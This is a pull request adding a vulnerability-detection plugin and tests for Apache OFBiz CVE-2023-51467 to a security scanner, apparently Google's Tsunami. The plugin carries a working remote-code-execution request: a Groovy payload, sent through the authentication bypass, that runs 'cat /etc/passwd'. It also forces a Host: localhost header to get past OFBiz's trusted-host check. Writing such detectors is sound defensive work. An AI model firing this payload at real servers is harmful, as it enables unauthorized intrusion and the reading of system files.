### PR TITLE
feat: upload textproto for Ofbiz_CVE_2023_51467

### DIFF
--- a/templated/templateddetector/plugins/cve/2025/Ofbiz_CVE_2023_51467.textproto
+++ b/templated/templateddetector/plugins/cve/2025/Ofbiz_CVE_2023_51467.textproto
@@ -1,0 +1,86 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "Ofbiz_CVE_2023_51467"
+  author: "W0ngL1"
+  version: "1.0"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "CVE-2023-51467"
+  }
+  severity: CRITICAL
+  title: "Apache Ofbiz Authentication Bypass Leads to RCE (CVE-2023-51467)"
+  description: "The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code."
+  recommendation: "Update the version to 22.01.01/18.12.10 or later."
+  related_id: {
+    publisher: "CVE"
+    value: "CVE-2023-51467"
+  }
+}
+
+config: {}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "fingerprinting_for_ofbiz"
+  http_request: {
+    method: GET
+    uri: "/accounting/control/main"
+    headers: [
+      { name: "Host" value: "localhost" }
+    ]
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "OFBiz" }
+        ]
+      }
+    }
+  }
+}
+
+actions: {
+  name: "trigger_rce"
+  http_request: {
+    method: POST
+    uri: "/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
+    headers: [
+      { name: "Content-Type" value: "application/x-www-form-urlencoded" },
+      { name: "Host" value: "localhost" }
+    ]
+    data: "groovyProgram=throw+new+Exception('cat /etc/passwd'.execute().text);"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "root:"},
+          { body: {} contains: ":0:0:"}
+        ]
+      }
+    }
+  }
+}
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  actions: [
+    "fingerprinting_for_ofbiz",
+    "trigger_rce"
+  ]
+}

--- a/templated/templateddetector/plugins/cve/2025/Ofbiz_CVE_2023_51467_test.textproto
+++ b/templated/templateddetector/plugins/cve/2025/Ofbiz_CVE_2023_51467_test.textproto
@@ -1,0 +1,81 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "Ofbiz_CVE_2023_51467"
+}
+
+tests: {
+  name: "whenVulnerable_returnsTrue"
+  expect_vulnerability: true
+
+  mock_callback_server: {
+    enabled: false
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/accounting/control/main"
+        status: 200
+        body_content: "Powered by<a href=\"http://ofbiz.apache.org\" target=\"_blank\">Apache OFBiz.</a> Release18"
+      },
+      {
+        uri: "/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
+        status: 200
+        body_content: "root:x:0:0:root:/root:/bin/bash"
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotVulnerable_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: false
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/accounting/control/main"
+        status: 200
+        body_content: "Powered by<a href=\"http://ofbiz.apache.org\" target=\"_blank\">Apache OFBiz.</a> Release18"
+      },
+      {
+        uri: "/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
+        status: 200
+        body_content: ""
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotOfbiz_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: false
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/accounting/control/main"
+        status: 200
+        body_content: "<title>Hello World</title>something"
+      },
+      {
+        uri: "TSUNAMI_MAGIC_ANY_URI"
+        status: 200
+        body_content: "Hello world"
+      }
+    ]
+  }
+}


### PR DESCRIPTION
Hi @tooryx, @leonardo-doyensec,

It's the templated plugin for Ofbiz_CVE_2023_51467, whick linked to https://github.com/google/tsunami-security-scanner-plugins/issues/388.
Here is the testbed PR: https://github.com/google/security-testbeds/pull/168.

I found a small but practical issue when testing Apache OFBiz: after deployment OFBiz treats localhost as a trusted host by default, so requests that use any other IP trigger a “host not trusted” error. To work around this I added a Host: localhost header in my vulnerability plugin requests, but in real scans the trusted host can get changed by the configuration, which makes reliable reproduction harder.
I considered using the built-in T_NS_HOSTNAME variable, but that doesn’t match the local deployment behavior I want to reproduce (it’s inconvenient to force a scanner to use the machine’s hostname as Host). 
A few ideas that might help:
Add an explicit option to the scanner/plugin to force a custom Host header (e.g. force_host: "localhost") so tests can reliably reproduce host-based checks even when proxying or using different target IPs.